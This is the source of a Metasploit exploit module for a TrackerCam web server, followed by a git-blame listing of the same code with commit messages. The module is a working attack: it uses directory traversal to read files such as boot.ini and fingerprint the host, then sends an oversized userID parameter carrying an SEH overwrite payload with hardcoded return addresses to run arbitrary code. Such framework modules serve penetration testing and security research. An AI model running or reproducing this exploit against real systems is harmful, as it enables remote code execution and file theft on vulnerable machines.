modules/exploits/windows/http/trackercam_phparg_overflow.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TrackerCam PHP Argument Buffer Overflow',
      'Description'    => %q{
          This module exploits a simple stack buffer overflow in the
        TrackerCam web server. All current versions of this software
        are vulnerable to a large number of security issues. This
        module abuses the directory traversal flaw to gain
        information about the system and then uses the PHP overflow
        to execute arbitrary code.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-0478'],
          [ 'OSVDB', '13953'],
          [ 'OSVDB', '13955'],
          [ 'BID', '12592'],
          [ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 2048,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # EyeWD.exe has a null and we can not use a partial overwrite.
          # All of the loaded application DLLs have a null in the address,
          # except CPS.dll, which moves around between instances :-(

          ['Windows 2000 English',		{ 'Ret' => 0x75022ac4 }], # ws2help.dll
          ['Windows XP English SP0/SP1',	{ 'Ret' => 0x71aa32ad }], # ws2help.dll
          ['Windows NT 4.0 SP4/SP5/SP6',	{ 'Ret' => 0x77681799 }], # ws2help.dll

          # Windows XP SP2 and Windows 2003 are not supported yet :-/
        ],
      'DisclosureDate' => '2005-02-18',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(8090)
      ])
  end

  def check
    res = send_request_raw({
      'uri'   => '/tuner/ComGetLogFile.php3',
      'query' => 'fn=../HTTPRoot/socket.php3'
    }, 5)

    if (res and res.body =~ /fsockopen/)
      fp = fingerprint()
      vprint_status("Detected a vulnerable TrackerCam installation on #{fp}")
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    c = connect

    buf = rand_text_english(8192)
    seh = generate_seh_payload(target.ret)
    buf[257, seh.length] = seh

    print_status("Sending request...")
    res = send_request_raw({
      'uri'   => '/tuner/TunerGuide.php3',
      'query' => 'userID=' + buf
    }, 5)

    handler
  end

  def download_log(path)

    res = send_request_raw({
      'uri'   => '/tuner/ComGetLogFile.php3',
      'query' => 'fn=' + ("../" * 10) + path
    }, 5)

    return if !(res and res.body and res.body =~ /tuner\.css/ and res.body =~ /<pre>/)

    m = res.match(/<pre>(.*)<\/pre><\/body>/smi)
    return if not m
    return m[1]
  end

  def fingerprint

    res = download_log(rand_text_alphanumeric(12) + '.txt')
    return if not res

    m = res.match(/in <b>(.*)<\/b> on line/smi)
    return if not m

    path = m[1]

    print_status("TrackerCam installation path is #{path}")

    if (path !~ /^C/i)
      print_status("TrackerCam is not installed on the system drive, we can't fingerprint it")
      return
    end

    if (path !~ /Program Files/i)
      print_status("TrackerCam is installed in a non-standard location")
    end

    boot = download_log('boot.ini')
    return if not boot

    case boot
      when /Windows XP.*NoExecute/i
        return "Windows XP SP2+"
      when /Windows XP/
        return "Windows XP SP0-SP1"
      when /Windows.*2003/
        return "Windows 2003"
      when /Windows.*2000/
        return "Windows 2000"
      else
        return "Unknown OS/SP"
    end
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::Seh`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'Name' => 'TrackerCam PHP Argument Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a simple stack buffer overflow in the`
New modules, module renames 2005-12-26 14:34:22 +00:00			`TrackerCam web server. All current versions of this software`
			`are vulnerable to a large number of security issues. This`
			`module abuses the directory traversal flaw to gain`
			`information about the system and then uses the PHP overflow`
			`to execute arbitrary code.`
			`},`
			`'Author' => [ 'hdm' ],`
New licensing terms, revision bump to v3 2006-01-21 22:10:20 +00:00			`'License' => MSF_LICENSE,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'References' =>`
			`[`
Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules 2009-07-27 14:05:23 +00:00			`[ 'CVE', '2005-0478'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '13953'],`
			`[ 'OSVDB', '13955'],`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[ 'BID', '12592'],`
			`[ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],`
			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 2048,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[`
			`# EyeWD.exe has a null and we can not use a partial overwrite.`
			`# All of the loaded application DLLs have a null in the address,`
			`# except CPS.dll, which moves around between instances :-(`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`['Windows 2000 English', { 'Ret' => 0x75022ac4 }], # ws2help.dll`
			`['Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad }], # ws2help.dll`
			`['Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`# Windows XP SP2 and Windows 2003 are not supported yet :-/`
New modules, module renames 2005-12-26 14:34:22 +00:00			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2005-02-18',`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`Opt::RPORT(8090)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def check`
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`res = send_request_raw({`
			`'uri' => '/tuner/ComGetLogFile.php3',`
			`'query' => 'fn=../HTTPRoot/socket.php3'`
			`}, 5)`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`if (res and res.body =~ /fsockopen/)`
			`fp = fingerprint()`
Saving progress 2014-01-21 11:07:03 -06:00			`vprint_status("Detected a vulnerable TrackerCam installation on #{fp}")`
			`return Exploit::CheckCode::Detected`
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def exploit`
			`c = connect`
Retab modules 2013-08-30 16:28:54 -05:00
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`buf = rand_text_english(8192)`
New modules, module renames 2005-12-26 14:34:22 +00:00			`seh = generate_seh_payload(target.ret)`
			`buf[257, seh.length] = seh`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`print_status("Sending request...")`
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`res = send_request_raw({`
			`'uri' => '/tuner/TunerGuide.php3',`
			`'query' => 'userID=' + buf`
			`}, 5)`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`handler`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
rename to download_log to avoid conflicting with the mixin 2017-08-14 01:10:37 -04:00			`def download_log(path)`
Retab modules 2013-08-30 16:28:54 -05:00
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`res = send_request_raw({`
			`'uri' => '/tuner/ComGetLogFile.php3',`
			`'query' => 'fn=' + ("../" * 10) + path`
			`}, 5)`
Retab modules 2013-08-30 16:28:54 -05:00
Another large number of warnings fixed by Yoann Guillot 2009-10-25 17:18:23 +00:00			`return if !(res and res.body and res.body =~ /tuner\.css/ and res.body =~ /<pre>/)`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`m = res.match(/<pre>(.*)<\/pre><\/body>/smi)`
			`return if not m`
			`return m[1]`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def fingerprint`
Retab modules 2013-08-30 16:28:54 -05:00
rename to download_log to avoid conflicting with the mixin 2017-08-14 01:10:37 -04:00			`res = download_log(rand_text_alphanumeric(12) + '.txt')`
Patch for Ruby 1.9 compat (not there yet) 2008-09-22 15:52:18 +00:00			`return if not res`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`m = res.match(/in <b>(.*)<\/b> on line/smi)`
			`return if not m`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`path = m[1]`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`print_status("TrackerCam installation path is #{path}")`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`if (path !~ /^C/i)`
New modules, module renames 2005-12-26 14:34:22 +00:00			`print_status("TrackerCam is not installed on the system drive, we can't fingerprint it")`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`if (path !~ /Program Files/i)`
New modules, module renames 2005-12-26 14:34:22 +00:00			`print_status("TrackerCam is installed in a non-standard location")`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
rename to download_log to avoid conflicting with the mixin 2017-08-14 01:10:37 -04:00			`boot = download_log('boot.ini')`
Patch for Ruby 1.9 compat (not there yet) 2008-09-22 15:52:18 +00:00			`return if not boot`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`case boot`
			`when /Windows XP.*NoExecute/i`
			`return "Windows XP SP2+"`
			`when /Windows XP/`
			`return "Windows XP SP0-SP1"`
			`when /Windows.*2003/`
			`return "Windows 2003"`
			`when /Windows.*2000/`
			`return "Windows 2000"`
			`else`
			`return "Unknown OS/SP"`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`end`
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules 2009-07-27 14:05:23 +00:00			`end`